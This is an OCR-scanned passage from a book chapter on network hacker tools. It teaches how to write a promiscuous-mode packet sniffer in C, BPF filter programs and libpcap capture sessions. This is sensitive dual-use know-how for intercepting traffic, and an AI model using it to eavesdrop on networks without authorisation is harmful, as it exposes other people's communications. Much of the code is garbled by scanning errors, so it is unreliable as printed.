the values of the headers’ fields to the screen. The sniffer analyzes only headers of the Ethernet 
protocol, IP, ARP, TCP, UDP, and ICMP. It is possible, however, to add a capability to ana- 
lyze other types of headers to the program. You can do this yourself as homework. To gain 
access to the necessary header, first the following pointers must be defined: 

struct ethhdr eth; 

Struct iphdr *ip; 

struct arphdr *arp; 

struct tephdr *tcp; 

struct udphdr *udp; 

struct icmphdr *icmp; 

All header structure definitions are taken from header files — except the ARP header 
structure, which is defined in the program. The reasons for which a header file ARP structure 
cannot be used are explained in Section 3.4.3. 
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Now the necessary headers can be extracted from the received data. This is done as follows: 


/* Extracting the Ethernet header */ 
memcpy {(char *) seth, data, sizeof(struct ethhdr)); 
/* Extracting the ARP header */ 


arp = (struct arphdr *) (data + sizeof(struct ethhdr)); 
/* Extracting the IP header */ 
ip = (struct iphdr *) (data + sizeof{struct ethhdr)); 


/* Extracting the TCP header */ 

tcp = (struct tephdr *) (data + sizeof(struct ethhdr) + sizeof(struct iphdr)); 

/* Extracting the UDP header */ 

ude = (struct udphdr *) (data + sizeof(struct ethhdr) + sizeof(struct iphdr)}; 

/* Extracting the ICMP header */ 

icmp = (struct icmphdr *) (data + sizeof(struct ethhdr) + sizeof(struct iphdr)); 

Then the fields of all structures can be referenced in the conventional way. For example, 
the TTL field in the IP header is output as follows: 


printf ("TTL S$d\n", ip->ttl); 


In the process, some fields must be converted from the network byte order to the server 
byte order using the byte-order conversion functions, such as the ntohs() function. I deter- 
mined the fields that must be converted experimentally. 

Naturally, a packet cannot contain simultaneously the IP and ARP headers or the TCP 
and UDP headers. Consequently, the sniffer must determine the packet’s headers; that is, 
it must determine the type of the received packet. The first step in solving this task is to ana- 
lyze the Packet type field in the Ethernet header: 

/* Is it ARP or RARP? */ 


if ((ntohs(eth.h_prote) = ETH_P ARP) || 
intohs(eth.h proto) == ETH P RARP)) { 

/* Is it IPB? */ 

if (ntohs(eth.h proto) == ETH P IP) { 


If the received packet is an IP packet, the second step is to analyze the Protocol field to 
determine the higher header: 

/* Is it TCP? */ 

if ((ip->protecol) == IPPROTO_TCP) { 

/* Is it UDP? */ 

if ((ip->protoecol) == IPPROTO UDP) { 

/* Is it ICMP? */ 

if ({ip->protocol) == IPPROTO_ICMP) { ... 


The Dump (buf, n) function is executed if the -n parameter is specified in the command 
line. It outputs the received data as a hex and ASCII dump. 





Listing 9.2. A passive sniffer (sklsniff.c) 





#include <stdic.h> 

#include <string.h> 

#include <sys/socket .h> 

#include <features.h> /* For the glibc version number */ 
#if GLIBC >= 2 && GLIBC MINOR >= 1 
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#include <netpacket/packet .h> 

#include <net/ethernet.h> /* L2 protocols */ 
ftelse 

#include <asm/types.h> 

finclude <linux/if packet.h> 

#include <linux/if ether.h> /* L2 protocols */ 
f#endif 

#include <sys/ioctl.h> 

#include <linux/in.h> 

#include <linux/if.h> 

#include <linux/ip.h> 

#include <linux/tcp.h> 

#include <linux/udp.h> 

#include <linux/icmp.h> 


#define DEVICE "etho" 
fdefine IP_DF 0x4000 
define IP | ME Ox2000 


struct arphdr 
{ 


unsigned short ar_hrd; /* Format of the hardware 
unsigned short ar pro; /* Format of the protocol 
unsigned char ar hin; /* Length of the hardware 
unsigned char ar pln; /* Length of the protocol 
unsigned short ar op; /* ARP opcode (command) 
unsigned char ar_sha{ETH_ALEN]; /* Sender hardware address 
unsigned char ar sip[4); /* Sender IP address 
unsigned char ar_tha[{ETH_ALEN]; /* Target hardware address 
unsigned char ar tip{4); /* Target IP address 

hi 

j* se ae ms a te eee ec er 


address 
address 
address 
address 


———— = f 


/* A function to output the header fields of the received PRenete +f 


PeintHeaders (void *data) 

{ 
struct ethhdr eth; 
struct iphdr *ip; 
struct arphdr *arp; 
struct tcephdr *tep; 
struct udphdr *udp; 
struct icmphdr *icmp; 


memcpy ((char *) seth, data, sizeof(struct ethhdr)); 
printf ("==ETHERNET HEADER============ =saaaaaeesae \r) 7 


printf ("MAC destination wh 
printf (":%.20:%.2K:%.26:¢.2K:%.2x:%.2x\n", 








eth.h_source[0), eth.h_source[1], eth.h source[zZ], 
eth.h_ source[3], eth.nh_source[4], eth.h_source[5]); 


printf ("MAC source a 


*/ 
cd 
*/ 
a3 
ay 
*/ 
*/ 
*/ 
*/ 
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printi(":$. 241%. 2x23. 2x18.2e33,.2e7%.2e\n", 
eth, h dest[(0), eth.h dest[1], eth.h dest[2], 
eth.h_dest(3], eth.hn_dest[4], eth.h_dest[5]); 
printf("Packet type ID field :##x\n", ntohs(eth.h proto) ); 


if ((ntohs(eth.h.prote) == ETH_P_ARP) || 
(ntohs(eth.h proto) == ETH P RARP)) { 
arp = (struct arphdr *) (data + sizeof(struct ethhdr)); 








printf("Format of hardware address :td\n", htons(arp->ar_hrd)); 
printf("Format of protocol address :#d\n", arp->ar_pro); 


printf ("Length MAC 
printt("Length IP 

printf ("ARP opcode 
print£("Sender hardware address 


printf ("Sender IP address 


printf ("Target hardware address 


printf("Target IP address 


:td\n", arp->ar_hin); 

:¢d\n", arp->ar pln); 

:td\n", htons(arp->ar_op)); 

*% 242% 2x23 ..2K1%.2K2%.2x1%.2e\n", 


arp->ar sha[0], 
arp->ar_ sha[l], 
arp->ar sha[2], 
arp->ar sha[3], 
arp->ar sha[4], 
arp->ar_sha[5], 
arp->ar_sha[6]); 


:$d.3d.3d.3d\n", 


arp->ar_sip[0], 
arp->ar sip[l], 
arp->ar sip(2], 
arp->ar_sip[3)); 


2.223. 2e2 RB SRS. SHER 2REEL 2K", 


arp->ar_tha[0], 
arp->ar tha [ 1] Fa 
arp->ar_tha[2], 
arp->ar tha[3], 
arp->ar tha[4], 
arp->ar_tha[5], 
arp->ar tha(6]); 


rtd.%d.td.td\n", 


arp->ar tip[0], 
arp->ar tip[1], 
arp->ar tip[2], 
arp->ar tip[3]); 


PIINtl ("SHHHHHTHS RATER RTE HEE R ATER RARER TEE FERRE RE") | 


} 


if (ntohs(eth.h proto) = ETH P IP) 


( 


ip = (struct iphdr *) (data + sizeof(struct ethhdr) }; 





printf ("==IP_HEADER==== 








TS SE STS ES et hi i“ 


printft("IP version 
printf("IP header length 
printf ("TOs 


:td\n", ip->version); 
d\n", ip->ihl); 
:%d\n", ip->tos); 


123 


124 Part ll: Network Hacker Tools 


printf ("Total length d\n", ntohs (ip->tot len) ); 
printf£("ID :$d\n", ntohs(ip->id)); 

printf ("Fragment offset :é#x\n", ntohs(ip->frag_ off) ); 

printf ("MF :éd\n", ntohs(ip->frag_off)&IP_MF?1:0); 
printf ("DF 7td\n", ntohs(ip->frag_off)&IP_DF?1:0); 
printf ("TTL std\n", ip->ttl); 

printf ("Protocol :td\n", ip->protocol); 

printf("IP source :$s\n", inet ntoa(ip->saddr) ); 

printt ("IP destination :$si\n", inet ntoa(ip->daddr)); 


if ((ip->protecol) == IPPROTO TCP) { 
tcp = (struct tcphdr *) (data + sizeof(struct ethhdr) + sizeof(struct iphdr)); 
printf ("==TCP HEADER=see2see22ssenss2 sees \ 7") | 
print£t ("Port source :sd\n", ntohs (tcp->source) ); 
printf ("Port destination :#d\n", ntohs(tcp->dest) ); 
printf ("Sequence number :td\n", ntohs(tcp->seq) ); 
printf ("Ack number :éd\n", ntohs(tcp->ack_seq) ); 
printE ("Data offset 7$d\n", tep->doft); 
printf£({"FIN:¢d,", tep->fin); 
printt£ ("SYN:%d,", tcp->syn); 
printf ("RST:#d,", tep->rst); 
printf ("PSH:%d,", tcp->psh); 
printf ("ACK:%d,", tcp->ack); 
printf ("URG:%d,", tcp->urg); 
printf ("ECE:#d,", tcp->ece); 
print£("CWR:%d\n", tcp->cwr); 
printt ("Window :$d\n", ntohs (tcp->window) ); 
printt ("Urgent pointer :$d\n", tep->urg ptr); 

} 


if ({ip->protocol) == IPPROTO UDP) { 
udp = (struct udphdr *) (data + sizeof(struct ethhdr) + sizeof(struct iphdr) ); 
p rintt ( " =:UDP HEADER=sssessseesesssssssessssssssesaes \n WL } . 


printf ("Port source stdin", ntohs (udp->source) ); 
printf("Port destination :%#d\n", ntohs(udp->dest)); 
printf (“Length 7$d\n", ntohs (udp->len)); 


} 


if ((ip->protecol) == IPPROTO_ICMP) { 

icmp = (struct icmphdr *) (data + sizeof(struct ethhdr) + sizeof(struct iphdr)); 
printf ("==ICMP HEADER@se==2ssme=ssseessssssssssssssses= \r") ; 

print£ ("Type s$d\n", lomp->type) ; 

Print£ ("Code s$d\n", Lomp->code) ; 
} 


PLInNth ("HHS HRRHHARHA REE HPS RRR S HERR HE ERE A RRR HERA RE) 7 


vold Dump(void* data, int len) 
{ 

unsigned char *buf = data; 

int: 13 

int poz = 0; 

char str[17); 

memseti(str, 0, 17); 

for (1 = 0; 1 < len; i++) 

{ 

if (poz & 16 == 0) 


printft(" %s\nt04x: ", str, poz); 
memsetistr, 0, 17); 


} 


if (buf[poz) < ' ' || buff[poz] >= 127) 
str{poztl6é] = '.'; 

else 
str[poztl6] = buf{poz]; 


printf ("’02xX ", buf[poz++]); 
J 
printf(" %*s\n\n", 16 + (16 - len % 16) * 2, str); 
} 


fF ee eee eee Se eee «ff 
/* The main() function */ 
fore ee a 
int main{int argc, char*® argv[]} 
1 

int sd; 

int n = 0; 


int packet = 0; 
struct ifregq ifr; 
char buf[1500]; 


fprintt i stder ry 0 a 
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in" Vz 


fprintf(stderr, "= Simple passive sniffer by Ivan Sklyaroff, 2006 =\n"); 
fprintf(stderr, “= [-d] - dump a block of data in hex and ASCII =\n"); 








fprintfii(stderr, ": ————— hones 





—— \n") : 


if ( (sd = socket (PF_PACKET, SOCK RAW, htons(ETH P ALL))) < Q) { 


perror("socket() failed"); 
exit(-1); 


} 


/* Switching the interface into the promiscuous mode */ 
strcepy(ifr.ifr name, DEVICE); 
if (ioctlisd, SIOCGIFFLAGS, &ifr) < 0) { 
perror("loctl() failed"); 
close (sd) ; 
exit (-1); 


125 


) 
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} 
ifr.,ifr flags |= IFF_PROMISC; 


1f ({loctl(sd, SIOCSIFFLAGS, &ifr) < 0) { 
perror("ioctl() falled"); 
close (sd); 
exit (-1); 


} 


/* Receiving packets in an endless loop */ 

while (1) 

i 
n= recvfromisd, buf, sizeof(buf), 0, 0, OO); 
DEINE ("#HHEFSFESRR HHA S SS REE EHR HA SEER RATHER RRR RR RES EH I"): 
printf ("Packet #%d ($d bytes read)\n", ++packet, n); 


/* Outputting the header fields of the received packets */ 
PrintHeaders (buf); 


/* If the -d parameter was specified in the command line, show the 
received data as a hex and ASCII dump */ 
if {arge == 2) |{ 
if (!stromplargv[1], "-d")) 
Dump (buf, n); 
} 


printt("\n"); 


return O; 





9.1.1. A Passive Sniffer Using a BSD Packet Filter 


The passive sniffer considered in the preceding example analyzes all the traffic passing through 
the network card of the computer, on which it is installed. In practice, however, there is usu- 
ally no need to analyze all packets indiscriminately; only some of them, for example, packets 
exchanged between specific hosts, must be analyzed. To this end, network packets have to be 
filtered by the source and destination IP addresses and by other parameters. The first way of 
handling this task is to use the conditional if statement in the program. This method was par- 
tially employed in the previous example to analyze whether the network packet headers per- 
tained to a specific protocol. This method, however, has some shortcomings. For one thing, 
it is too cumbersome to be used for a full-scale filter with comprehensive capabilities. Its main 
shortcoming, however, is that filtering takes place on the application level. Copying data from 
the kernel space to the user space takes much time; when used in fast channels, the analyzer 
may not be able to process all data received from the network, and some packets may be lost. 
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The second method is to use the BSD Packet Filter (BPF). BPF is a register-based filtration 
mechanism that uses specific filters for each received packet. It was developed by Steve 
McCanne and Van Jacobson and is used on practically all UNIX systems. The filtration proc- 
ess takes place inside the kernel at the data link layer and is independent of network protocols. 
Consequently, irrelevant packets are discarded at the network driver level, before the received 
data are passed to the application. 

An interesting tidbit concerning BPF: It was used by the famous hacker Kevin Mitnick. 
Here is an excerpt from one media article (“Hi, [’m a Hacker”, by Alexander Zapolskis) on the 
subject: 

BPF (which played far from the last role in this detective story) is the basis of the spy software 
developed by Shimomura. In “Takedown,” he describes how he modified the existing version of 
BPF to run on any computer without its owner's knowledge. The modified program intercepts 
incoming and outgoing Internet traffic and sends this information to the person who infiltrated it. 
It’s obvious that this is an ideal spy gadget, which can be used to obtain both civilian and military 
strategic information. It just happened so that Mitnick also used BPF to ransack Shimomiuira’s 
computer. Thus, the great manhunt for the hacker of the century was precipitated not so much by 
his being dangerous or difficult to catch, but because he willingly or unwillingly intruded into too 
big of a game played by the military and intelligence. 

Thus, by learning BPF you can touch the sublime! 


9.1.1.1. The BPF Pseudo Assembler Language 


Linux has its own filter called Linux Socket Filter (LSF), but it is the same BPF and uses the 
same instructions. All LSF structures are defined in the /linux/filter.h header file. Nevertheless, 
for the improved sniffer I use the classical BPF, whose structures are defined in the /net/bpf.h 
header file. The structure names used in these two files are different. 

The filtering program is written in a special pseudo-processor machine language. This 
language has instructions for loading and storing operands, for arithmetic and logic opera- 
tions, and for conditional and unconditional jumps. For working with operands, the pseudo 
processor provides an accumulator register (or simply an accumulator), an index register, 
memory cells, and an internal program counter. 

Just like no one nowadays writes low-level programs in machine codes for a regular proc- 
essor, using more human-friendly assembler instead, the BPF pseudo processor has its own 
pseudo assembler, in which each machine code has a corresponding mnemonic. (All defini- 
tions of the mnemonics are given in the header file.) So a BPF for the improved sniffer is also 
written in the pseudo assembler and not in the machine code. 

Unfortunately, Linux has no man for either BPF or LSF. Therefore, most of the following 
information was taken from the BSD man 4 bpf. 

The filtration program is an array of instructions. The format of each instruction is de- 
fined by the following instruction data structure: 

struct bpf insn { 

u_ short code; /* Actual filter code */ 
u_char jt; /* Jump if TRUE. */ 


| 
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/* Jump if FALSE. */ 
/* Common use field */ 


u_char 
bpf int32 


ay ladle 
se hay 
ley 


be 

The code field contains the instruction code, the jt and jf fields modify the instruction 
execution order in the filtration program, and the k field holds the value of the instruction 
operand. 

Altogether, there are eight instruction classes: BPF_LD, BPF_LDX, BPF_ST, BPF_STX, 
BPF ALU, BPF JMP, BPF_RET,and BPF misc. The description of each class follows. 

The /net/bpf.h header file contains macrodefinitions, which make the task of developing 
a filtration program easier: 

Hdefine BPF_STMT(code, k) { (u_short) (code), 0, 0, K } 

Hdefine BPF_JUMPicode, k, jt, jf) { (u_short) (code), jt, jf, k } 

BPF_LD 

The BFP_LD instruction loads values into the accumulator. The values can be of one of the 
following types: 


A constant (BPF_IMM) 

Packet data located at a fixed offset (BPF ABS) 
Packet data located at a variable offset (BPF IND) 
The packet length (BPF LEN) 

A memory value (BPF_ MEM) 


OOQOdOO 


The size of loaded BPF IND and BPF ABS values must be specified as word (BPF_ Ww), half- 
word (BPF_H), or byte (BPF_B). For 32-bit processors, a word is 4 bytes. 

The following three examples show how to load 4 bytes, 2 bytes, and 1 byte of packet data 
into the accumulator. The offset in the packet is specified by the k constant. 

BPF_LD + BPF_W + BPF_ABS A <- P[k:4] 

BPF LD + BPF H + BPF ABS A <- P{k:2] 

BPF LD + BPF B + BPF ABS A <- P[k:1] 

The following three examples show how to load 4 bytes, 2 bytes, and | byte of packet data 
into the accumulator. The offset in the data block is specified by the sum of the x variable and 
the k constant. The x variable is the value in the index register. 

BPF LD + BPF W + BPF IND A <- P[X + k:4] 

BPF LD + BPF H + BPF IND A. <- P[X + kK:2] 

BPF LD + BPF_B + BPF IND A <- P[X + k:1] 

The packet length is loaded into the accumulator: 

BPF LD + BPF W+ BPF LEN A <- len 

The k constant is loaded into the accumulator: 

BPF LD + BPF_IMM A <- k 

The memory value stored at address k is loaded into the accumulator: 

BPF_LD + BPF MEM A <- MIK] 
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BPF_LDX 
The BFP LDxX instruction loads values into the index register. The value can be of one of 
the following types: 


A constant (BPF_IMM) 

The packet length (BPF_ LEN) 

A memory value (BPF_MEM) 

The length of the packet's IP header (BPF_MSH) 


OOO 0 


The following are a few examples of using this instruction. 

A word-size value k is loaded into the index register: 

BPF LDX + BPF W+ BPF IMM xX <- k 

The memory value stored at address k is loaded into the index register: 

BPF LDX + BPF_W+ BPF_MEM X <- M[k] 

The packet length is loaded into the index register: 

BPF LDX + BPF W+ BPF LEN X <- len 

The length of the packet's IP header is loaded into the index register: 

BPF LDX + BPF B + BPF MSH X <- 4*(P[k:1]40xf) 

BPE ST 

The BFP ST instruction loads the value from the accumulator into memory: 
BPF_ ST M[k] <- A 

The address of the memory cell is specified by the & value. 

BPF_STX 

The BFP_STX instruction loads the value from the index register into memory: 
BPF STX M[k] <- x 

The address of the memory cell is specified by the k value. 

BPF_ALU 

The BPF ALU instruction performs arithmetic and logic operations on the value in the 


accumulator and in the index register or on the value in the accumulator and a constant; it stores 
the result in the accumulator. The following are examples of using this instruction: 


BPF ALU + BPF_ADD + BPF_K A <- A + k 
BPF ALU + BPF_SUB + BPF_K A <- A - k 
BPF ALU + BPF MUL + BPF_K A <-A * k 
BPF ALU + BPF DIV+ BPF K A<-A/k 
BPF ALU + BPF AND + BPF_K A <-A& k 
BPF ALU + BPF OR + BPF K A<-A | k 
BPF ALU + BPF_LSH + BPF_K A <- A << k 
BPF ALU + BPF RSH + BPF K A <- A >> k 
BPF ALU + BPF ADD + BPF X A <- A+ X 
BPF ALU + BPF SUB + BPF X A <-A - X 
BPF ALU + BPF MUL + BPF X A <- A * X 
BPF ALU + BPF DIV + BPF X A <-A / X 
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BPF_ALU + BPF_AND + BPF_X A <-A & X 
BPF ALU + BPF OR + BPFX A<-A | X 
BPF ALU + BPF LSH + BPF X A <- A << X 
BPF ALU + BPF RSH + BPF X A <- A >> X 
BPF_ALU + BPF_NEG A <- -A 
BPF_JMP 


The BPF_JMP instruction changes the execution order of a filtration program. The instruc- 
tion can perform both conditional (JGT, JGE, JEQ, and JsET) and unconditional (BPF_JA) 
jumps. For conditional jumps, the value in the accumulator is compared to the k constant 
(BPF_K) or the value in the index register (BPF_x). For unconditional jumps, the offset is speci- 
fied by a 32-bit value; for conditional ones, it is specified by an 8-bit value. The offset is the 
number of instructions that the filtration program must skip. Consequently, the longest con- 
ditional jump is 2° = 256 instructions. 

The following are examples of using this instruction. 

An unconditional jump is made to the offset specified by the 32-bit k value: 

BPE UMP + BPF_JA pe += k 

The values in the accumulator and the k constant are compared. A conditional jump to 
the offset specified in the jt field is performed if the A > k condition is satisfied: 

BPF JMP + BPF_JGT + BPFK pe += (A>k) ? jt: jf 


A few more examples: 
BPF JMP + BPF JGE + BPF K pe += (A >=k) ? jt : jf 


BPF_JMP + BPF_JEQ + BPFK pe += (A ==k) ? jt: jf 
BPF_JMP + BPF_JSET + BPF K pe += (A & k) ? jt: if 
BPF_JMP + BPF_JGT + BPF X pc += (A > X) ? jt: jf 
BPF JMP + BPF JGE + BPF X pc += (A >= X) ? jt : jf 
BPF UMP + BPF_JEQ + BPF xX pe. += (A-== xX) ? Jt =: 3f 
BEF JMP + BPF_JSET + BPF X pe += (A & X) ? jt: jf 


BPF_RET 

The result of the filter's operation is a positive integer, which specifies the number of bytes 
in the received packet that will be available for the user application for further processing. 
If the received packet does not meet the filtration conditions, the filtration program discards it 
and returns a 0 value. The BPF RET instruction terminates execution of the filtration program 
and returns the number of bytes in the packet available for further processing. 

The following is an example of a result returned by the instruction in the accumulator: 

BPF RET + BPF A 

The following is an example of a result returned by the instruction as a constant: 

BPF RET + BPF_K 

BPF MISC 

The BPF MISC instruction copies the value in the index register to the accumulator, and 
vice versa: 


BPF MISC + BPF TAX X <- A 
BPF MISC + BPF_TXA A <- xX 
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9.1.1.2. A Packet Filter Example Program 


As an example, consider a filter that accepts only UDP packets with the 192.168.10.130:777 
source address and port and the 192.168.10.1:80 destination address and port. 
To be able to use a BPF in the program, only one header file must be included: 


#include <net/bpf.h> 


In many UNIX systems, to obtain access to a BPF, a special symbolic device that is not be- 
ing used by another process (/dev/bpf0, /dev/bpf1, etc.) must be opened using the open () 
function. Then the device’s different properties must be specified by executing a series of 
iect1() function calls. 

None of this has to be done in Linux. Simply define the necessary structures and variables, 
write a filtration program, and connect it to a socket. 

For the program, a variable, call it bp, of the bpf program structure type must be defined: 

struct bpf program bp; 

The following is the definition of this structure as given in the /net/bpf.h header file: 

struct bpt program | 


u_short bf len; // Number of structures in the array 
struct bpf_insn *bf_insns; // Pointer to the bpf_insn array of 
structures 


}e 

After the filtration program is constructed, the structure's fields will have to be filled. 
The bf isnsns field stores a pointer to the filtration program, which ts an array of structures: 
struct bpf insn; the bf len field stores the number of structures in the array. 

Listing 9.3 shows the commented source code for the filtration program. 





Listing 9.3. The filtration program 





struct bpf_insn filter_app[] = { 


/* Loading 2 bytes into the accumulator that are offset 12 bytes from the beginning of 
the Ethernet header of the received packet. The bytes contain the identifier of the 
network layer protocol. */ 

BPF STMT(BPF_LD + BPF_H + BPF_ABS, 12), 


/* Comparing the value in the accumulator with the IP identifier (ETH_P_IP = 0x800). 
If the condition is satisfied, jump to the next instruction (jt = 0); otherwise, jump 
12: structures lower (jf = 12) and leave the filtration program, returning a zero value. 
This means that the given packet has been rejected. */ 

BPF JUMP(BPF JMP + BPF JEQ + BPF_K, ETH P IP, 0, 12), 


/* Loading 1 byte at offset 23 into the accumulator. This field holds the identifier of 
the transport layer protocol. For UDP, this value is 17. */ 
BPF STMT(BPF LD + BPF B + BPF ABS, 23), 


/* Checking whether the value corresponds to the necessary transport protocol. 
If the condition is satisfied, jump to the next instruction (jt=0); otherwise, jump 
10 structures lower (jf = 10) and leave the filtration program, returning a zero value. */ 
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APF JUMP(BPF JMP + BPF JEQ + BPF_K, IPPROTO UDP, 0, 10), 


/* Loading a 4-byte value at offset 26 in the received packet into the accumulator. 
This value is the source IP address. */ 
BPF STMT(BPF LD + BPF W + BPF ABS, 26), 


/* Comparing the value in the accumulator with IP address 192.168.10.130. The value 
OxcOag0Qas2 is the hexadecimal representation of this IP address in the little-endian 
format. If the address does not match, exit the filtration program, */ 

BPF JUMP(BPF JMP + BPF JEQ + BPF_K, OxcOa80a82, 0, 8), 


/* Loading the destination IP address, which is at offset 30, and comparing it with 
address 192.168.10.1 (OxcOa80a01). If the addresses do not match, exit the filtration 
program. */ 

BPF STMT(BPF LD + BPF_W + BPF ABS, 30), 

BPF_JUMP(BPF_JMP + BPF_JEQ + BPF_K, OxcOas0a0l, 0, 6), 


/* Checking whether the Source port field is 777 (0x309). First, the IP header length 
must be determined. */ 


BPF_STMT(BPF LDX + BPF_B + BPF MSH, 14), 


/* The IP packet header Length will be loaded into the index register. The Source port 
field will be at the offset that is the sum of the lengths of the Ethernet header and the 
IP header. Loading it into the accumulator. */ 

BPF STMT(BPF LD + BPFH + BPF IND, 14), 


/* Checking the obtained value. */ 
BPF JUMP (BPF JUMP + BPF_JEQ + BPF_K, 0x309, 0, 3), 


BPF STMT (BPF LD + BPF_H + BPF_IND, 16), 
BPF JUMP(BPF_JMP + BPF_JEQ + BPF_K, 0x50, 0, 1), 


/* Exiting the filtration program */ 
BPF STMT (BPF RET + BPF &,1500), 
BPF STMT (BEF RET + BPF_K,0), 

he 





Now that the filtration program has been put together, fill the fields of the struct 
bpf program bp structure: 
bp.bf_len = 15; // Number of structures in the filtration program 
bp.bf insns = filter app; // Pointer to the filtration program 
The last thing that needs to be done to get the filter working is to attach it to a socket by 
calling the setsockopt () function as follows: 
if(setsockopt (sd, SOL_SOCKET, SO_ATTACH FILTER, &bp, sizeof(bp)) < 0) { 
perror ("SO ATTACH FILTER") ; 
close (sd); 
exit{—-1); 
} 
Although the filtration program works as intended, it has one serious shortcoming: 
The source data (i.e., [P addresses and port numbers) are specified in the program’s source code. 
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Thus, every time when the filtration conditions are changed, the source code has to be modi- 
fied and the program must be recompiled. 

This can be fixed, and the IP addresses and port numbers can be specified in the com- 
mand line when the sniffer is started. This is done by zeroing out the fields that contain IP 
addresses and port numbers: 

BPF_JUMP(BPF JMP + BPF_JEQ + BPF_K, 0, 0, 8), // 6th element 

BPF JUMP (BPF JUMP + BPF JEQ + BPF_K, 0, 0, 6), // 8th element 

BPF JUMP(BPF JMP + BPF JEQ + BREF EK, GO, O, 3), // llth element 

BPF JUMP(BPF_JMP + BPF JEQ + BPF K, 0, 0, 1), // 13th element 


Now, these fields are filled using the following statements: 
filter app[5].k =  swab32(source ip); 

filter app[7].k = _ swab32 (dest ip); 

filter app[10].k = sport; 

filter app[12].k = dport; 

The replacement values are taken from the command line: 


source ip = inet _addr(argv[1]}; 
sport = atoilargv[2]); 

dest_ip = inet_addr(argv[3]); 
dport = atoi/(arav[4]); 


The __ swab32() macro is used to convert the IP address to the network byte order for- 
mat. This macro is defined in the /linux/byteorder/swab.h header file. 

The tcpdump utility can be helpful in putting together the filtration program. When run with 
the -d option, the utility dumps the filtration program code, showing command names and 
numbering the output lines. The -dd option dumps the filtration program code as a C program 
fragment. The -ddd option dumps the filtration program code as decimal numbers. 

Here's an example: 

# tcpdump -dd udp and sre host 192.168.10.130 and src port 777 and dst host 


Ox6, 0, O, OxO000fECE }, 
0x6, 0, 0, Ox00000000 }, 


192.166.10.1 and dst port 80 
{ 0x28, 0, 0, Oxf£L£ELOOO }, 
{ 0x15, 0, 14, Ox00000800 }, 
{ 0x30, 0, 0, Ox00000009 }, 
{ Ox15, 0, 12, OxO00000011 }, 
{ 0#20, 0, 0, Ox0000000c }, 
{ 0x15, 0, 10, OxcOa80a82 }, 
{ 0x28, 0, 0, Ox00000006 }, 
{ 0x45, 8, O, OxOQQ01fTT }, 
{ Oxbl, 0, 0, Ox00000000 }, 
{ 0x48, 0, O, Ox00000000 }, 
{ 0x15, 0, 5, Ox00000309 }, 
{ 0x20, 0, 0, Ox00000010 }, 
{ 0x15, O, 3, OxcOabhOall }j, 
{ 0x46, 0, 0, Ox00000002 }, 
{ 0x15, 0, 1, Ox00000050 }, 
{ 


The source code for the passive sniffer using BPF, named sklsniff_bpf.c, can be found in 
the /PART II/Chapter 9 directory on the accompanying CD-ROM. 
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9.1.2. A Sniffer Using the libpcap Library 


Developing a filtration program using BPF is a difficult undertaking. The task of program- 
ming sniffers in general and of creating filters in particular is made significantly easier by using 
the libpcap packet capture library, created by Van Jacobson, Craig Leres, and Steve McCanne. 
The libpeap library is used by many well-known utilities, for example, the tcpdump and 
Ettercap network traffic analyzers and the Snort intrusion-prevention and detection system. 

Libpeap library versions exist for many other operating systems, including Windows; this 
means that it can be used to create portable applications. 

The latest version of the libpcap library can be found at http://www.tcpdump.org. Also, 
the library usually comes with most of Linux distributions. 

Programs developed using libpcap must have root privileges or the SUID bit set. 

The typical sequence of steps that a program using the libpcap library must perform to 
get its job done is the following: 


Identify the network interface. 

Open a network interface and create an intercept session. 
Create a filter if necessary. 

Capture and process packets. 

Close the intercept session. 


oe op oo 


A detailed description of each step follows. 


9.1.2.1. Identifying the Network Interface 


There are three main methods for creating a network interface for network listening. 
In the first method, the libpcap library is not used and the name of the interface is hard- 
coded in the program. This method was already used in previous programs. 
#define DEVICE “ethdO" 
The interface name can also be passed to the program in the command line by the user. 
The second method uses the pcap lookupdev() function from the libpcap library: 


Finclude <pcap.h> 

char *dev; 

char errbuf[PCAP ERRBUF SIZE]; 
dey = pcap lookupdev(errbuf); 
Lf (dev == NULL) { 


fprintf(stderr, "$s", errbut); 
exit(-lL); 
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In this case, the dev variable will be set to the name of a suitable interface. If the 
peap lockupdev() function generates an error, its description is passed to the errbut buffer. 
The prototype of the pcap lookupdev() function has the following form: 


char *pcap lookupdev(char *errbuf) 


Programs that use the libpeap library must include the pcap.h header file. 

In the third method, the user can select an interface from a list. This list is prepared using 
the pcap findalidevs() function from the libpcap library: 

#include <pcap.h> 


ao @ 


pcap if t *alldevsp; 
char errbuf[PCAP_ERRBUF SIZE); 


if (peap findalldevs(salldevsp, errbuf) < Q) { 
fprintf(stderr, "ts", errbut); 
exit (-1); 
) 
while (alldevsp != NULL) { 
printf ("ts\n", alldevsp->name} ; 
alldevsp = alldevsp->next; 


The peap findalldevs() function takes a pointer to pcap if _t and returns a linked list 
with information about the interfaces found. If the pcap findalldevs() function generates 
an error, its description is passed to the errbuf buffer. 

The pcap if _t type (this type is derived from pcap if) is a structure containing volumi- 
nous information that can be useful: 


typedef struct peap_ if pcap if t; 
struct peap if [ 


struct peap if *next; /* Pointer to the next list item */ 

char *name; /* Name of the interface */ 

char *description; /* Textual description of the interface or 
NULL */ 


struct pcap addr *addresses; /* IP address, network mask, broadcast 
address, etc. */ 
bpf u_int32 flags; /* Equals PCAP_IF LOOPBACK for the 
leopback interface */ 
ye 
The *address item is a pointer to the pcap addr structure, which contains additional 
information about the interface: 
struct pcap addr { 


struct pcap addr “next; /* Pointer to the next list item */ 
struct sockaddr *addr; /* IP address */ 

struct sockaddr *netmask; /* Network mask for this IP address */ 
struct sockaddr “broadaddr; /* Broadcast address */ 

struct sockaddr *dstaddr; /* Destination address for a 


point-to-point connection or NULL */ 
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The prototype of the pcap findallidevs() function has the following form: 
poap findalldevs(pcap if t **alldevsp, char *errbuf) 


Note that older versions of the libpcap library do not have the pcap findalldevs() function. 


9.1.2.2. Opening the Network Interface and Creating an Intercept Session 


The peap_open live() function opens a network interface and creates an intercept session. 
Its prototype has the following form: 
pcap t *pcap open live(const char *device, int snapléen, int promisc, int to ms, char 
*errbut) 


Its elements are as follows: 


device — The interface name determined in the first step 

snaplen — An integer specifying the maximum number of the network packet bytes that 
will be captured by the library 

promisc — The flag switching the interface into the promiscuous mode (1 for set and 0 
for not set) 

to ms — The timeout time in milliseconds (0 for reading until the first error and -1 for 
reading endlessly) 

errbuf — A buffer to hold error messages 


Oo ff 2 oo 


The function returns a session descriptor. 
The following is a sample code fragment: 


finclude <pcap.h> 


peap t *handle; 
char errbuf[PCAP ERRBUF SIZE]; 


handle = peap open_live(dev, BUFSIZ, 1, 0, errbuf); 
if (handle =—= NULL) { 
fprintf(stderr, “ts", errbuf); 
exit (-1}; 
} 
if (strlien(errbuf) > 0) { 
fprintf(stderr, “Warning: $s", errbuf); 
errbuf[0] = 0; 
} 


